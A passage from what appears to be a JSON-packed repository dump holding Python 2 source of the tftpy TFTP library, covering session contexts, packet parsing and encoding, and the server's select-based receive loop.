Time when this context last received any traffic.\n        # FIXME: does this belong in metrics?\n        self.last_update = 0\n        # The last packet we sent, if applicable, to make resending easy.\n        self.last_pkt = None\n        self.dyn_file_func = dyn_file_func\n        # Count the number of retry attempts.\n        self.retry_count = 0\n\n    def getBlocksize(self):\n        \"\"\"Fetch the current blocksize for this session.\"\"\"\n        return int(self.options.get('blksize', 512))\n\n    def __del__(self):\n        \"\"\"Simple destructor to try to call housekeeping in the end method if\n        not called explicitely. Leaking file descriptors is not a good\n        thing.\"\"\"\n        self.end()\n\n    def checkTimeout(self, now):\n        \"\"\"Compare current time with last_update time, and raise an exception\n        if we're over the timeout time.\"\"\"\n        log.debug(\"checking for timeout on session %s\" % self)\n        if now - self.last_update > self.timeout:\n            raise TftpTimeout, \"Timeout waiting for traffic\"\n\n    def start(self):\n        raise NotImplementedError, \"Abstract method\"\n\n    def end(self):\n        \"\"\"Perform session cleanup, since the end method should always be\n        called explicitely by the calling code, this works better than the\n        destructor.\"\"\"\n        log.debug(\"in TftpContext.end\")\n        if self.fileobj is not None and not self.fileobj.closed:\n            log.debug(\"self.fileobj is open - closing\")\n            self.fileobj.close()\n\n    def gethost(self):\n        \"Simple getter method for use in a property.\"\n        return self.__host\n\n    def sethost(self, host):\n        \"\"\"Setter method that also sets the address property as a result\n        of the host that is set.\"\"\"\n        self.__host = host\n        self.address = socket.gethostbyname(host)\n\n    host = property(gethost, sethost)\n\n    def setNextBlock(self, block):\n        if block >= 2 ** 16:\n            log.debug(\"Block number rollover to 0 again\")\n            block = 0\n        self.__eblock = block\n\n    def getNextBlock(self):\n        return self.__eblock\n\n    next_block = property(getNextBlock, setNextBlock)\n\n    def cycle(self):\n        \"\"\"Here we wait for a response from the server after sending it\n        something, and dispatch appropriate action to that response.\"\"\"\n        try:\n            (buffer, (raddress, rport)) = self.sock.recvfrom(MAX_BLKSIZE)\n        except socket.timeout:\n            log.warn(\"Timeout waiting for traffic, retrying...\")\n            raise TftpTimeout, \"Timed-out waiting for traffic\"\n\n        # Ok, we've received a packet. Log it.\n        log.debug(\"Received %d bytes from %s:%s\"\n                        % (len(buffer), raddress, rport))\n        # And update our last updated time.\n        self.last_update = time.time()\n\n        # Decode it.\n        recvpkt = self.factory.parse(buffer)\n\n        # Check for known \"connection\".\n        if raddress != self.address:\n            log.warn(\"Received traffic from %s, expected host %s. Discarding\"\n                        % (raddress, self.host))\n\n        if self.tidport and self.tidport != rport:\n            log.warn(\"Received traffic from %s:%s but we're \"\n                        \"connected to %s:%s. Discarding.\"\n                        % (raddress, rport,\n                        self.host, self.tidport))\n\n        # If there is a packethook defined, call it. We unconditionally\n        # pass all packets, it's up to the client to screen out different\n        # kinds of packets. This way, the client is privy to things like\n        # negotiated options.\n        if self.packethook:\n            self.packethook(recvpkt)\n\n        # And handle it, possibly changing state.\n        self.state = self.state.handle(recvpkt, raddress, rport)\n        # If we didn't throw any exceptions here, reset the retry_count to\n        # zero.\n        self.retry_count = 0\n\nclass TftpContextServer(TftpContext):\n    \"\"\"The context for the server.\"\"\"\n    def __init__(self, host, port, timeout, root, dyn_file_func=None):\n        TftpContext.__init__(self,\n                             host,\n                             port,\n                             timeout,\n                             dyn_file_func\n                             )\n        # At this point we have no idea if this is a download or an upload. We\n        # need to let the start state determine that.\n        self.state = TftpStateServerStart(self)\n        self.root = root\n        self.dyn_file_func = dyn_file_func\n\n    def __str__(self):\n        return \"%s:%s %s\" % (self.host, self.port, self.state)\n\n    def start(self, buffer):\n        \"\"\"Start the state cycle. Note that the server context receives an\n        initial packet in its start method. Also note that the server does not\n        loop on cycle(), as it expects the TftpServer object to manage\n        that.\"\"\"\n        log.debug(\"In TftpContextServer.start\")\n        self.metrics.start_time = time.time()\n        log.debug(\"Set metrics.start_time to %s\" % self.metrics.start_time)\n        # And update our last updated time.\n        self.last_update = time.time()\n\n        pkt = self.factory.parse(buffer)\n        log.debug(\"TftpContextServer.start() - factory returned a %s\" % pkt)\n\n        # Call handle once with the initial packet. This should put us into\n        # the download or the upload state.\n        self.state = self.state.handle(pkt,\n                                       self.host,\n                                       self.port)\n\n    def end(self):\n        \"\"\"Finish up the context.\"\"\"\n        TftpContext.end(self)\n        self.metrics.end_time = time.time()\n        log.debug(\"Set metrics.end_time to %s\" % self.metrics.end_time)\n        self.metrics.compute()\n\nclass TftpContextClientUpload(TftpContext):\n    \"\"\"The upload context for the client during an upload.\n    Note: If input is a hyphen, then we will use stdin.\"\"\"\n    def __init__(self,\n                 host,\n                 port,\n                 filename,\n                 input,\n                 options,\n                 packethook,\n                 timeout):\n        TftpContext.__init__(self,\n                             host,\n                             port,\n                             timeout)\n        self.file_to_transfer = filename\n        self.options = options\n        self.packethook = packethook\n        if input == '-':\n            self.fileobj = sys.stdin\n        else:\n            self.fileobj = open(input, \"rb\")\n\n        log.debug(\"TftpContextClientUpload.__init__()\")\n        log.debug(\"file_to_transfer = %s, options = %s\" %\n            (self.file_to_transfer, self.options))\n\n    def __str__(self):\n        return \"%s:%s %s\" % (self.host, self.port, self.state)\n\n    def start(self):\n        log.info(\"Sending tftp upload request to %s\" % self.host)\n        log.info(\"    filename -> %s\" % self.file_to_transfer)\n        log.info(\"    options -> %s\" % self.options)\n\n        self.metrics.start_time = time.time()\n        log.debug(\"Set metrics.start_time to %s\" % self.metrics.start_time)\n\n        # FIXME: put this in a sendWRQ method?\n        pkt = TftpPacketWRQ()\n        pkt.filename = self.file_to_transfer\n        pkt.mode = \"octet\" # FIXME - shouldn't hardcode this\n        pkt.options = self.options\n        self.sock.sendto(pkt.encode().buffer, (self.host, self.port))\n        self.next_block = 1\n        self.last_pkt = pkt\n        # FIXME: should we centralize sendto operations so we can refactor all\n        # saving of the packet to the last_pkt field?\n\n        self.state = TftpStateSentWRQ(self)\n\n        while self.state:\n            try:\n                log.debug(\"State is %s\" % self.state)\n                self.cycle()\n            except TftpTimeout, err:\n                log.error(str(err))\n                self.retry_count += 1\n                if self.retry_count >= TIMEOUT_RETRIES:\n                    log.debug(\"hit max retries, giving up\")\n                    raise\n                else:\n                    log.warn(\"resending last packet\")\n                    self.state.resendLast()\n\n    def end(self):\n        \"\"\"Finish up the context.\"\"\"\n        TftpContext.end(self)\n        self.metrics.end_time = time.time()\n        log.debug(\"Set metrics.end_time to %s\" % self.metrics.end_time)\n        self.metrics.compute()\n\nclass TftpContextClientDownload(TftpContext):\n    \"\"\"The download context for the client during a download.\n    Note: If output is a hyphen, then the output will be sent to stdout.\"\"\"\n    def __init__(self,\n                 host,\n                 port,\n                 filename,\n                 output,\n                 options,\n                 packethook,\n                 timeout):\n        TftpContext.__init__(self,\n                             host,\n                             port,\n                             timeout)\n        # FIXME: should we refactor setting of these params?\n        self.file_to_transfer = filename\n        self.options = options\n        self.packethook = packethook\n        # FIXME - need to support alternate return formats than files?\n        # File-like objects would be ideal, ala duck-typing.\n        # If the filename is -, then use stdout\n        if output == '-':\n            self.fileobj = sys.stdout\n        elif type(output) == str:\n            self.fileobj = open(output, \"wb\")\n        else:\n            self.fileobj = output\n\n        log.debug(\"TftpContextClientDownload.__init__()\")\n        log.debug(\"file_to_transfer = %s, options = %s\" %\n            (self.file_to_transfer, self.options))\n\n    def __str__(self):\n        return \"%s:%s %s\" % (self.host, self.port, self.state)\n\n    def start(self):\n        \"\"\"Initiate the download.\"\"\"\n        log.info(\"Sending tftp download request to %s\" % self.host)\n        log.info(\"    filename -> %s\" % self.file_to_transfer)\n        log.info(\"    options -> %s\" % self.options)\n\n        self.metrics.start_time = time.time()\n        log.debug(\"Set metrics.start_time to %s\" % self.metrics.start_time)\n\n        # FIXME: put this in a sendRRQ method?\n        pkt = TftpPacketRRQ()\n        pkt.filename = self.file_to_transfer\n        pkt.mode = \"octet\" # FIXME - shouldn't hardcode this\n        pkt.options = self.options\n        self.sock.sendto(pkt.encode().buffer, (self.host, self.port))\n        self.next_block = 1\n        self.last_pkt = pkt\n\n        self.state = TftpStateSentRRQ(self)\n\n        while self.state:\n            try:\n                log.debug(\"State is %s\" % self.state)\n                self.cycle()\n            except TftpTimeout, err:\n                log.error(str(err))\n                self.retry_count += 1\n                if self.retry_count >= TIMEOUT_RETRIES:\n                    log.debug(\"hit max retries, giving up\")\n                    raise\n                else:\n                    log.warn(\"resending last packet\")\n                    self.state.resendLast()\n\n    def end(self):\n        \"\"\"Finish up the context.\"\"\"\n        TftpContext.end(self)\n        self.metrics.end_time = time.time()\n        log.debug(\"Set metrics.end_time to %s\" % self.metrics.end_time)\n        self.metrics.compute()\n"
  },
  {
    "path": "tftpy/TftpPacketFactory.py",
    "content": "\"\"\"This module implements the TftpPacketFactory class, which can take a binary\nbuffer, and return the appropriate TftpPacket object to represent it, via the\nparse() method.\"\"\"\n\nfrom TftpShared import *\nfrom TftpPacketTypes import *\n\nclass TftpPacketFactory(object):\n    \"\"\"This class generates TftpPacket objects. It is responsible for parsing\n    raw buffers off of the wire and returning objects representing them, via\n    the parse() method.\"\"\"\n    def __init__(self):\n        self.classes = {\n            1: TftpPacketRRQ,\n            2: TftpPacketWRQ,\n            3: TftpPacketDAT,\n            4: TftpPacketACK,\n            5: TftpPacketERR,\n            6: TftpPacketOACK\n            }\n\n    def parse(self, buffer):\n        \"\"\"This method is used to parse an existing datagram into its\n        corresponding TftpPacket object. The buffer is the raw bytes off of\n        the network.\"\"\"\n        log.debug(\"parsing a %d byte packet\" % len(buffer))\n        (opcode,) = struct.unpack(\"!H\", buffer[:2])\n        log.debug(\"opcode is %d\" % opcode)\n        packet = self.__create(opcode)\n        packet.buffer = buffer\n        return packet.decode()\n\n    def __create(self, opcode):\n        \"\"\"This method returns the appropriate class object corresponding to\n        the passed opcode.\"\"\"\n        tftpassert(self.classes.has_key(opcode),\n                   \"Unsupported opcode: %d\" % opcode)\n\n        packet = self.classes[opcode]()\n\n        return packet\n"
  },
  {
    "path": "tftpy/TftpPacketTypes.py",
    "content": "\"\"\"This module implements the packet types of TFTP itself, and the\ncorresponding encode and decode methods for them.\"\"\"\n\nimport struct\nfrom TftpShared import *\n\nclass TftpSession(object):\n    \"\"\"This class is the base class for the tftp client and server. Any shared\n    code should be in this class.\"\"\"\n    # FIXME: do we need this anymore?\n    pass\n\nclass TftpPacketWithOptions(object):\n    \"\"\"This class exists to permit some TftpPacket subclasses to share code\n    regarding options handling. It does not inherit from TftpPacket, as the\n    goal is just to share code here, and not cause diamond inheritance.\"\"\"\n\n    def __init__(self):\n        self.options = {}\n\n    def setoptions(self, options):\n        log.debug(\"in TftpPacketWithOptions.setoptions\")\n        log.debug(\"options: \" + str(options))\n        myoptions = {}\n        for key in options:\n            newkey = str(key)\n            myoptions[newkey] = str(options[key])\n            log.debug(\"populated myoptions with %s = %s\"\n                         % (newkey, myoptions[newkey]))\n\n        log.debug(\"setting options hash to: \" + str(myoptions))\n        self._options = myoptions\n\n    def getoptions(self):\n        log.debug(\"in TftpPacketWithOptions.getoptions\")\n        return self._options\n\n    # Set up getter and setter on options to ensure that they are the proper\n    # type. They should always be strings, but we don't need to force the\n    # client to necessarily enter strings if we can avoid it.\n    options = property(getoptions, setoptions)\n\n    def decode_options(self, buffer):\n        \"\"\"This method decodes the section of the buffer that contains an\n        unknown number of options. It returns a dictionary of option names and\n        values.\"\"\"\n        format = \"!\"\n        options = {}\n\n        log.debug(\"decode_options: buffer is: \" + repr(buffer))\n        log.debug(\"size of buffer is %d bytes\" % len(buffer))\n        if len(buffer) == 0:\n            log.debug(\"size of buffer is zero, returning empty hash\")\n            return {}\n\n        # Count the nulls in the buffer. Each one terminates a string.\n        log.debug(\"about to iterate options buffer counting nulls\")\n        length = 0\n        for c in buffer:\n            #log.debug(\"iterating this byte: \" + repr(c))\n            if ord(c) == 0:\n                log.debug(\"found a null at length %d\" % length)\n                if length > 0:\n                    format += \"%dsx\" % length\n                    length = -1\n                else:\n                    raise TftpException, \"Invalid options in buffer\"\n            length += 1\n\n        log.debug(\"about to unpack, format is: %s\" % format)\n        mystruct = struct.unpack(format, buffer)\n\n        tftpassert(len(mystruct) % 2 == 0,\n                   \"packet with odd number of option/value pairs\")\n\n        for i in range(0, len(mystruct), 2):\n            log.debug(\"setting option %s to %s\" % (mystruct[i], mystruct[i+1]))\n            options[mystruct[i]] = mystruct[i+1]\n\n        return options\n\nclass TftpPacket(object):\n    \"\"\"This class is the parent class of all tftp packet classes. It is an\n    abstract class, providing an interface, and should not be instantiated\n    directly.\"\"\"\n    def __init__(self):\n        self.opcode = 0\n        self.buffer = None\n\n    def encode(self):\n        \"\"\"The encode method of a TftpPacket takes keyword arguments specific\n        to the type of packet, and packs an appropriate buffer in network-byte\n        order suitable for sending over the wire.\n\n        This is an abstract method.\"\"\"\n        raise NotImplementedError, \"Abstract method\"\n\n    def decode(self):\n        \"\"\"The decode method of a TftpPacket takes a buffer off of the wire in\n        network-byte order, and decodes it, populating internal properties as\n        appropriate. This can only be done once the first 2-byte opcode has\n        already been decoded, but the data section does include the entire\n        datagram.\n\n        This is an abstract method.\"\"\"\n        raise NotImplementedError, \"Abstract method\"\n\nclass TftpPacketInitial(TftpPacket, TftpPacketWithOptions):\n    \"\"\"This class is a common parent class for the RRQ and WRQ packets, as\n    they share quite a bit of code.\"\"\"\n    def __init__(self):\n        TftpPacket.__init__(self)\n        TftpPacketWithOptions.__init__(self)\n        self.filename = None\n        self.mode = None\n\n    def encode(self):\n        \"\"\"Encode the packet's buffer from the instance variables.\"\"\"\n        tftpassert(self.filename, \"filename required in initial packet\")\n        tftpassert(self.mode, \"mode required in initial packet\")\n\n        ptype = None\n        if self.opcode == 1: ptype = \"RRQ\"\n        else:                ptype = \"WRQ\"\n        log.debug(\"Encoding %s packet, filename = %s, mode = %s\"\n                     % (ptype, self.filename, self.mode))\n        for key in self.options:\n            log.debug(\"    Option %s = %s\" % (key, self.options[key]))\n\n        format = \"!H\"\n        format += \"%dsx\" % len(self.filename)\n        if self.mode == \"octet\":\n            format += \"5sx\"\n        else:\n            raise AssertionError, \"Unsupported mode: %s\" % mode\n        # Add options.\n        options_list = []\n        if self.options.keys() > 0:\n            log.debug(\"there are options to encode\")\n            for key in self.options:\n                # Populate the option name\n                format += \"%dsx\" % len(key)\n                options_list.append(key)\n                # Populate the option value\n                format += \"%dsx\" % len(str(self.options[key]))\n                options_list.append(str(self.options[key]))\n\n        log.debug(\"format is %s\" % format)\n        log.debug(\"options_list is %s\" % options_list)\n        log.debug(\"size of struct is %d\" % struct.calcsize(format))\n\n        self.buffer = struct.pack(format,\n                                  self.opcode,\n                                  self.filename,\n                                  self.mode,\n                                  *options_list)\n\n        log.debug(\"buffer is \" + repr(self.buffer))\n        return self\n\n    def decode(self):\n        tftpassert(self.buffer, \"Can't decode, buffer is empty\")\n\n        # FIXME - this shares a lot of code with decode_options\n        nulls = 0\n        format = \"\"\n        nulls = length = tlength = 0\n        log.debug(\"in decode: about to iterate buffer counting nulls\")\n        subbuf = self.buffer[2:]\n        for c in subbuf:\n            log.debug(\"iterating this byte: \" + repr(c))\n            if ord(c) == 0:\n                nulls += 1\n                log.debug(\"found a null at length %d, now have %d\"\n                             % (length, nulls))\n                format += \"%dsx\" % length\n                length = -1\n                # At 2 nulls, we want to mark that position for decoding.\n                if nulls == 2:\n                    break\n            length += 1\n            tlength += 1\n\n        log.debug(\"hopefully found end of mode at length %d\" % tlength)\n        # length should now be the end of the mode.\n        tftpassert(nulls == 2, \"malformed packet\")\n        shortbuf = subbuf[:tlength+1]\n        log.debug(\"about to unpack buffer with format: %s\" % format)\n        log.debug(\"unpacking buffer: \" + repr(shortbuf))\n        mystruct = struct.unpack(format, shortbuf)\n\n        tftpassert(len(mystruct) == 2, \"malformed packet\")\n        self.filename = mystruct[0]\n        self.mode = mystruct[1].lower() # force lc - bug 17\n        log.debug(\"set filename to %s\" % self.filename)\n        log.debug(\"set mode to %s\" % self.mode)\n\n        self.options = self.decode_options(subbuf[tlength+1:])\n        return self\n\nclass TftpPacketRRQ(TftpPacketInitial):\n    \"\"\"\n::\n\n            2 bytes    string   1 byte     string   1 byte\n            -----------------------------------------------\n    RRQ/  | 01/02 |  Filename  |   0  |    Mode    |   0  |\n    WRQ     -----------------------------------------------\n    \"\"\"\n    def __init__(self):\n        TftpPacketInitial.__init__(self)\n        self.opcode = 1\n\n    def __str__(self):\n        s = 'RRQ packet: filename = %s' % self.filename\n        s += ' mode = %s' % self.mode\n        if self.options:\n            s += '\\n    options = %s' % self.options\n        return s\n\nclass TftpPacketWRQ(TftpPacketInitial):\n    \"\"\"\n::\n\n            2 bytes    string   1 byte     string   1 byte\n            -----------------------------------------------\n    RRQ/  | 01/02 |  Filename  |   0  |    Mode    |   0  |\n    WRQ     -----------------------------------------------\n    \"\"\"\n    def __init__(self):\n        TftpPacketInitial.__init__(self)\n        self.opcode = 2\n\n    def __str__(self):\n        s = 'WRQ packet: filename = %s' % self.filename\n        s += ' mode = %s' % self.mode\n        if self.options:\n            s += '\\n    options = %s' % self.options\n        return s\n\nclass TftpPacketDAT(TftpPacket):\n    \"\"\"\n::\n\n            2 bytes    2 bytes       n bytes\n            ---------------------------------\n    DATA  | 03    |   Block #  |    Data    |\n            ---------------------------------\n    \"\"\"\n    def __init__(self):\n        TftpPacket.__init__(self)\n        self.opcode = 3\n        self.blocknumber = 0\n        self.data = None\n\n    def __str__(self):\n        s = 'DAT packet: block %s' % self.blocknumber\n        if self.data:\n            s += '\\n    data: %d bytes' % len(self.data)\n        return s\n\n    def encode(self):\n        \"\"\"Encode the DAT packet. This method populates self.buffer, and\n        returns self for easy method chaining.\"\"\"\n        if len(self.data) == 0:\n            log.debug(\"Encoding an empty DAT packet\")\n        format = \"!HH%ds\" % len(self.data)\n        self.buffer = struct.pack(format,\n                                  self.opcode,\n                                  self.blocknumber,\n                                  self.data)\n        return self\n\n    def decode(self):\n        \"\"\"Decode self.buffer into instance variables. It returns self for\n        easy method chaining.\"\"\"\n        # We know the first 2 bytes are the opcode. The second two are the\n        # block number.\n        (self.blocknumber,) = struct.unpack(\"!H\", self.buffer[2:4])\n        log.debug(\"decoding DAT packet, block number %d\" % self.blocknumber)\n        log.debug(\"should be %d bytes in the packet total\"\n                     % len(self.buffer))\n        # Everything else is data.\n        self.data = self.buffer[4:]\n        log.debug(\"found %d bytes of data\"\n                     % len(self.data))\n        return self\n\nclass TftpPacketACK(TftpPacket):\n    \"\"\"\n::\n\n            2 bytes    2 bytes\n            -------------------\n    ACK   | 04    |   Block #  |\n            --------------------\n    \"\"\"\n    def __init__(self):\n        TftpPacket.__init__(self)\n        self.opcode = 4\n        self.blocknumber = 0\n\n    def __str__(self):\n        return 'ACK packet: block %d' % self.blocknumber\n\n    def encode(self):\n        log.debug(\"encoding ACK: opcode = %d, block = %d\"\n                     % (self.opcode, self.blocknumber))\n        self.buffer = struct.pack(\"!HH\", self.opcode, self.blocknumber)\n        return self\n\n    def decode(self):\n        self.opcode, self.blocknumber = struct.unpack(\"!HH\", self.buffer)\n        log.debug(\"decoded ACK packet: opcode = %d, block = %d\"\n                     % (self.opcode, self.blocknumber))\n        return self\n\nclass TftpPacketERR(TftpPacket):\n    \"\"\"\n::\n\n            2 bytes  2 bytes        string    1 byte\n            ----------------------------------------\n    ERROR | 05    |  ErrorCode |   ErrMsg   |   0  |\n            ----------------------------------------\n\n    Error Codes\n\n    Value     Meaning\n\n    0         Not defined, see error message (if any).\n    1         File not found.\n    2         Access violation.\n    3         Disk full or allocation exceeded.\n    4         Illegal TFTP operation.\n    5         Unknown transfer ID.\n    6         File already exists.\n    7         No such user.\n    8         Failed to negotiate options\n    \"\"\"\n    def __init__(self):\n        TftpPacket.__init__(self)\n        self.opcode = 5\n        self.errorcode = 0\n        # FIXME: We don't encode the errmsg...\n        self.errmsg = None\n        # FIXME - integrate in TftpErrors references?\n        self.errmsgs = {\n            1: \"File not found\",\n            2: \"Access violation\",\n            3: \"Disk full or allocation exceeded\",\n            4: \"Illegal TFTP operation\",\n            5: \"Unknown transfer ID\",\n            6: \"File already exists\",\n            7: \"No such user\",\n            8: \"Failed to negotiate options\"\n            }\n\n    def __str__(self):\n        s = 'ERR packet: errorcode = %d' % self.errorcode\n        s += '\\n    msg = %s' % self.errmsgs.get(self.errorcode, '')\n        return s\n\n    def encode(self):\n        \"\"\"Encode the DAT packet based on instance variables, populating\n        self.buffer, returning self.\"\"\"\n        format = \"!HH%dsx\" % len(self.errmsgs[self.errorcode])\n        log.debug(\"encoding ERR packet with format %s\" % format)\n        self.buffer = struct.pack(format,\n                                  self.opcode,\n                                  self.errorcode,\n                                  self.errmsgs[self.errorcode])\n        return self\n\n    def decode(self):\n        \"Decode self.buffer, populating instance variables and return self.\"\n        buflen = len(self.buffer)\n        tftpassert(buflen >= 4, \"malformed ERR packet, too short\")\n        log.debug(\"Decoding ERR packet, length %s bytes\" % buflen)\n        if buflen == 4:\n            log.debug(\"Allowing this affront to the RFC of a 4-byte packet\")\n            format = \"!HH\"\n            log.debug(\"Decoding ERR packet with format: %s\" % format)\n            self.opcode, self.errorcode = struct.unpack(format,\n                                                        self.buffer)\n        else:\n            log.debug(\"Good ERR packet > 4 bytes\")\n            format = \"!HH%dsx\" % (len(self.buffer) - 5)\n            log.debug(\"Decoding ERR packet with format: %s\" % format)\n            self.opcode, self.errorcode, self.errmsg = struct.unpack(format,\n                                                                     self.buffer)\n        log.error(\"ERR packet - errorcode: %d, message: %s\"\n                     % (self.errorcode, self.errmsg))\n        return self\n\nclass TftpPacketOACK(TftpPacket, TftpPacketWithOptions):\n    \"\"\"\n::\n\n    +-------+---~~---+---+---~~---+---+---~~---+---+---~~---+---+\n    |  opc  |  opt1  | 0 | value1 | 0 |  optN  | 0 | valueN | 0 |\n    +-------+---~~---+---+---~~---+---+---~~---+---+---~~---+---+\n    \"\"\"\n    def __init__(self):\n        TftpPacket.__init__(self)\n        TftpPacketWithOptions.__init__(self)\n        self.opcode = 6\n\n    def __str__(self):\n        return 'OACK packet:\\n    options = %s' % self.options\n\n    def encode(self):\n        format = \"!H\" # opcode\n        options_list = []\n        log.debug(\"in TftpPacketOACK.encode\")\n        for key in self.options:\n            log.debug(\"looping on option key %s\" % key)\n            log.debug(\"value is %s\" % self.options[key])\n            format += \"%dsx\" % len(key)\n            format += \"%dsx\" % len(self.options[key])\n            options_list.append(key)\n            options_list.append(self.options[key])\n        self.buffer = struct.pack(format, self.opcode, *options_list)\n        return self\n\n    def decode(self):\n        self.options = self.decode_options(self.buffer[2:])\n        return self\n\n    def match_options(self, options):\n        \"\"\"This method takes a set of options, and tries to match them with\n        its own. It can accept some changes in those options from the server as\n        part of a negotiation. Changed or unchanged, it will return a dict of\n        the options so that the session can update itself to the negotiated\n        options.\"\"\"\n        for name in self.options:\n            if options.has_key(name):\n                if name == 'blksize':\n                    # We can accept anything between the min and max values.\n                    size = self.options[name]\n                    if size >= MIN_BLKSIZE and size <= MAX_BLKSIZE:\n                        log.debug(\"negotiated blksize of %d bytes\" % size)\n                        options[blksize] = size\n                else:\n                    raise TftpException, \"Unsupported option: %s\" % name\n        return True\n"
  },
  {
    "path": "tftpy/TftpServer.py",
    "content": "\"\"\"This module implements the TFTP Server functionality. Instantiate an\ninstance of the server, and then run the listen() method to listen for client\nrequests. Logging is performed via a standard logging object set in\nTftpShared.\"\"\"\n\nimport socket, os, time\nimport select\nfrom TftpShared import *\nfrom TftpPacketTypes import *\nfrom TftpPacketFactory import TftpPacketFactory\nfrom TftpContexts import TftpContextServer\n\nclass TftpServer(TftpSession):\n    \"\"\"This class implements a tftp server object. Run the listen() method to\n    listen for client requests.  It takes two optional arguments. tftproot is\n    the path to the tftproot directory to serve files from and/or write them\n    to. dyn_file_func is a callable that must return a file-like object to\n    read from during downloads. This permits the serving of dynamic\n    content.\"\"\"\n\n    def __init__(self, tftproot='/tftpboot', dyn_file_func=None):\n        self.listenip = None\n        self.listenport = None\n        self.sock = None\n        # FIXME: What about multiple roots?\n        self.root = os.path.abspath(tftproot)\n        self.dyn_file_func = dyn_file_func\n        # A dict of sessions, where each session is keyed by a string like\n        # ip:tid for the remote end.\n        self.sessions = {}\n\n        if os.path.exists(self.root):\n            log.debug(\"tftproot %s does exist\" % self.root)\n            if not os.path.isdir(self.root):\n                raise TftpException, \"The tftproot must be a directory.\"\n            else:\n                log.debug(\"tftproot %s is a directory\" % self.root)\n                if os.access(self.root, os.R_OK):\n                    log.debug(\"tftproot %s is readable\" % self.root)\n                else:\n                    raise TftpException, \"The tftproot must be readable\"\n                if os.access(self.root, os.W_OK):\n                    log.debug(\"tftproot %s is writable\" % self.root)\n                else:\n                    log.warning(\"The tftproot %s is not writable\" % self.root)\n        else:\n            raise TftpException, \"The tftproot does not exist.\"\n\n    def listen(self,\n               listenip=\"\",\n               listenport=DEF_TFTP_PORT,\n               timeout=SOCK_TIMEOUT):\n        \"\"\"Start a server listening on the supplied interface and port. This\n        defaults to INADDR_ANY (all interfaces) and UDP port 69. You can also\n        supply a different socket timeout value, if desired.\"\"\"\n        tftp_factory = TftpPacketFactory()\n\n        # Don't use new 2.5 ternary operator yet\n        # listenip = listenip if listenip else '0.0.0.0'\n        if not listenip: listenip = '0.0.0.0'\n        log.info(\"Server requested on ip %s, port %s\"\n                % (listenip, listenport))\n        try:\n            # FIXME - sockets should be non-blocking\n            self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n            self.sock.bind((listenip, listenport))\n        except socket.error, err:\n            # Reraise it for now.\n            raise\n\n        log.info(\"Starting receive loop...\")\n        while True:\n            # Build the inputlist array of sockets to select() on.\n            inputlist = []\n            inputlist.append(self.sock)\n            for key in self.sessions:\n                inputlist.append(self.sessions[key].sock)\n\n            # Block until some socket has input on it.\n            log.debug(\"Performing select on this inputlist: %s\" % inputlist)\n            readyinput, readyoutput, readyspecial = select.select(inputlist,\n                                                                  [],\n                                                                  [],\n                                                                  SOCK_TIMEOUT)\n\n            deletion_list = []\n\n            # Handle the available data, if any. Maybe we timed-out.\n            for readysock in readyinput:\n                # Is the traffic on the main server socket? ie. new session?\n                if readysock == self.sock:\n                    log.debug(\"Data ready on our main socket\")\n                    buffer, (raddress, rport) = self.sock.recvfrom(MAX_BLKSIZE)\n\n                    log.debug(\"Read %d bytes\" % len(buffer))\n\n                    # Forge a session key based on the client's IP and port,\n                    # which should safely work through NAT.\n                    key = \"%s:%s\" % (raddress, rport)\n\n                    if not self.sessions.has_key(key):\n                        log.debug(\"Creating new server context for \"\n                                     \"session key = %s\" % key)\n                        self.sessions[key] = TftpContextServer(raddress,\n                                                               rport,\n                                                               timeout,\n                                                               self.root,\n                                                               self.dyn_file_func)\n                        try:\n                            self.sessions[key].start(buffer)\n                        except TftpException, err:\n                            deletion_list.append(key)\n                            log.error(\"Fatal exception thrown from \"\n                                      \"session %s: %s\" % (key, str(err)))\n                    else:\n                        log.warn(\"received traffic on main socket for \"\n                                 \"existing session??\")\n                    log.info(\"Currently handling these sessions:\")\n                    for session_key, session in self.sessions.items():\n                        log.info(\"    %s\" % session)\n\n                else:\n                    # Must find the owner of this traffic.\n                    for key in self.sessions:\n                        if readysock == self.sessions[key].sock:\n                            log.info(\"Matched input to session key %s\"\n                                % key)\n                            try:\n                                self.sessions[key].cycle()\n                                if self.sessions[key].state == None:\n                                    log.info(\"Successful transfer.\")\n                                    deletion_list.append(key)\n                            except TftpException, err:\n                                deletion_list.append(key)\n                                log.error(\"Fatal exception thrown from \"\n                                          \"session %s: %s\"\n                                          % (key, str(err)))\n                            # Break out of for loop since we found the correct\n                            # session.\n                            break\n\n                    else:\n                        log.error(\"Can't find the owner for this packet. \"\n                                  \"Discarding.\")\n\n            log.debug(\"Looping on all sessions to check for timeouts\")\n            now = time.time()\n            for key in self.sessions:\n                try:\n                    self.sessions[key].checkTimeout(now)\n                except TftpTimeout, err:\n                    log.error(str(err))\n                    self.sessions[key].retry_count += 1\n                    if self.sessions[key].retry_count >= TIMEOUT_RETRIES:\n                        log.debug(\"hit max retries on %s, giving up\"\n                            % self.sessions[key])\n                        deletion_list.append(key)\n                    else:\n                        log.debug(\"resending on session %s\"\n                            % self.sessions[key])\n                        self.sessions[key].state.resendLast()\n\n            log.debug(\"Iterating deletion list.\")\n            for key in deletion_list:\n                log.info('')\n                log.info(\"Session %s complete\" % key)\n                if self.sessions.has_key(key):\n                    log.debug(\"Gathering up metrics from session before deleting\")\n                    self.sessions[key].end()\n                    metrics = self.sessions[key].metrics\n                    if metrics.duration == 0:\n                        log.info(\"Duration too short, rate undetermined\")\n                    else:\n                        log.info(\"Transferred %d bytes in %.2f seconds\"\n                            % (metrics.bytes, metrics.duration))\n                        log.info(\"Average rate: %.2f kbps\" % metrics.kbps)\n                    log.info(\"%.2f bytes in resent data\" % metrics.resent_bytes)\n                    log.info(\"%d duplicate packets\" % metrics.dupcount)\n                    log.debug(\"Deleting session %s\" % key)\n                    del self.sessions[key]\n                    log.debug(\"Session list is now %s\" % self.sessions)\n                else:\n                    log.warn(\"Strange, session %s is not on the deletion list\"\n                        % key)\n"
  },
  {
    "path": "tftpy/TftpShared.py",
